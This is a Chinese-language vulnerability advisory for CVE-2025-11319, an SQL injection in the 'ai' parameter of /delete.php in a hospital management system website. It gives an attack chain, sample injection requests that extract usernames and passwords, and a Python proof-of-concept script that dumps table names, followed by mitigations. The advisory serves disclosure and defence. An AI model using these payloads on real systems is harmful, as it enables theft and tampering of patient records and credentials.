CVE-2025-11319 Hospital-Management-System-Website SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11319

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

nahiduddinahammed Hospital-Management-System-Website

漏洞概述

CVE-2025-11319是Hospital-Management-System-Website（医院管理系统网站）中存在的一个SQL注入安全漏洞。该漏洞由VulDB披露，CVSS评分为6.3，属于中危级别。该漏洞影响nahiduddinahammed开发的Hospital-Management-System-Website项目，漏洞位于项目的/delete.php文件中，具体涉及对参数"ai"的处理逻辑存在缺陷，攻击者可以通过构造恶意的SQL语句注入到该参数中，从而实现未授权的数据库操作。

该漏洞的利用条件较为宽松，攻击者无需高权限即可通过网络远程发起攻击，且不需要用户交互。由于该产品采用滚动发布（rolling release）模式进行持续交付，因此没有明确的受影响版本号或已修复版本号可供参考。漏洞发现者曾尝试联系产品供应商进行协调披露，但供应商未作出任何回应。漏洞的利用代码（PoC）已经公开发布，这意味着该漏洞被实际利用的风险较高。

该漏洞的成功利用可能导致数据库中的敏感信息泄露、数据被篡改或删除，甚至在某些数据库配置下可能实现远程代码执行。对于医院管理系统这类存储大量患者个人信息和医疗记录的应用而言，此类漏洞的危害尤为严重，可能导致患者隐私数据的大规模泄露，对医疗机构的信息安全和患者隐私保护构成重大威胁。

技术细节

该SQL注入漏洞存在于Hospital-Management-System-Website项目的/delete.php文件中。漏洞的根本原因是程序在对用户输入的参数"ai"进行处理时，未能进行充分的输入验证和参数化处理，直接将用户可控的数据拼接到SQL查询语句中执行。

从技术层面分析，攻击者可以通过向/delete.php端点发送包含恶意SQL片段的HTTP请求来利用此漏洞。具体而言，攻击者会在"ai"参数中注入SQL元字符（如单引号、UNION关键字、OR条件等），从而改变原始SQL查询的语义。例如，攻击者可以构造如下请求：

GET /delete.php?ai=1' OR '1'='1

或者使用基于UNION的注入来提取数据库中的敏感信息：

GET /delete.php?ai=1' UNION SELECT username,password FROM users--

由于CVSS向量显示该漏洞的攻击复杂度低（AC:L）、所需权限低（PR:L），且无需用户交互（UI:N），攻击者只需要拥有基本的低权限账号即可远程发起攻击。漏洞对机密性、完整性和可用性均产生低级别影响（C:L/I:L/A:L），这意味着攻击者可以读取、修改和删除数据库中的数据。

该漏洞的PoC已经公开发布在GitHub上（参考链接中的mhszed/Report仓库），使得任何具备基本SQL注入知识的攻击者都可以轻松利用此漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统为Hospital-Management-System-Website，并确认/delete.php端点存在且可访问。

STEP 2

步骤2：漏洞探测

攻击者通过向/delete.php?ai=参数发送包含特殊字符（如单引号）的测试请求，检测是否存在SQL注入漏洞。通过对比正常响应与异常响应的差异确认漏洞存在。

STEP 3

步骤3：注入载荷构造

攻击者根据数据库类型（MySQL/MariaDB）构造相应的SQL注入payload，包括布尔型盲注、UNION联合查询注入等技术手段。

STEP 4

步骤4：数据提取

利用UNION注入或盲注技术，从数据库中提取敏感信息，如管理员凭据、患者个人信息、医疗记录等。

STEP 5

步骤5：权限提升与数据破坏

攻击者可利用注入漏洞执行UPDATE、DELETE等SQL语句，篡改或删除医疗数据，甚至通过数据库特性实现更深层次的入侵。

STEP 6

步骤6：持久化访问

攻击者可能利用提取的管理员凭据登录系统后台，建立持久化的未授权访问通道。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11319 - Hospital-Management-System-Website SQL Injection PoC
# Vulnerability: SQL Injection in /delete.php via 'ai' parameter
# Author: Security Researcher (based on public disclosure)

import requests
import sys

# Target configuration
TARGET_URL = "http://target-hospital-website.com"
INJECTION_ENDPOINT = "/delete.php"

def exploit_sql_injection(target_url, session_cookie=None):
    """
    Exploit SQL injection in the 'ai' parameter of delete.php
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    if session_cookie:
        headers["Cookie"] = session_cookie
    
    # Basic boolean-based SQL injection test
    payload_true = "1' OR '1'='1"
    payload_false = "1' OR '1'='2"
    
    url_true = f"{target_url}{INJECTION_ENDPOINT}?ai={payload_true}"
    url_false = f"{target_url}{INJECTION_ENDPOINT}?ai={payload_false}"
    
    try:
        # Test boolean-based injection
        resp_true = requests.get(url_true, headers=headers, timeout=10)
        resp_false = requests.get(url_false, headers=headers, timeout=10)
        
        if resp_true.status_code != resp_false.status_code or len(resp_true.text) != len(resp_false.text):
            print("[+] Target appears to be vulnerable to SQL injection!")
            print(f"[+] True response length: {len(resp_true.text)}")
            print(f"[+] False response length: {len(resp_false.text)}")
        
        # UNION-based injection to extract database info
        union_payload = "1' UNION SELECT 1,user(),database()-- -"
        url_union = f"{target_url}{INJECTION_ENDPOINT}?ai={union_payload}"
        resp_union = requests.get(url_union, headers=headers, timeout=10)
        
        print(f"[+] UNION injection response status: {resp_union.status_code}")
        print(f"[+] Response snippet: {resp_union.text[:500]}")
        
        return resp_union.text
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error during exploitation: {e}")
        return None

def extract_tables(target_url, session_cookie=None):
    """
    Attempt to extract table names using information_schema
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    
    if session_cookie:
        headers["Cookie"] = session_cookie
    
    # Extract table names
    payload = "1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- -"
    url = f"{target_url}{INJECTION_ENDPOINT}?ai={payload}"
    
    try:
        resp = requests.get(url, headers=headers, timeout=10)
        print(f"[+] Tables extraction response: {resp.text[:1000]}")
        return resp.text
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_URL
    
    print(f"[*] Testing SQL injection on: {target}")
    result = exploit_sql_injection(target)
    
    if result:
        print("[*] Attempting to extract database tables...")
        extract_tables(target)

影响范围

nahiduddinahammed Hospital-Management-System-Website (所有使用滚动发布的版本，截至commit e6562429e14b2f88bd2139cae16e87b965024097)

防御指南

临时缓解措施

由于产品供应商未对漏洞披露作出回应且采用滚动发布模式，建议采取以下临时缓解措施：1）立即在Web服务器层面部署WAF规则，阻止对/delete.php端点ai参数的SQL注入攻击；2）通过修改Web服务器配置（如Nginx/Apache规则）临时限制对/delete.php的直接访问；3）对数据库进行审计，查看是否有异常的DELETE操作记录；4）修改数据库连接账号为低权限账号，限制其只能执行必要的查询操作；5）监控Web服务器和数据库日志，及时发现潜在的利用行为；6）考虑自行修复源码中的SQL拼接问题，将相关查询改为参数化查询后再部署上线。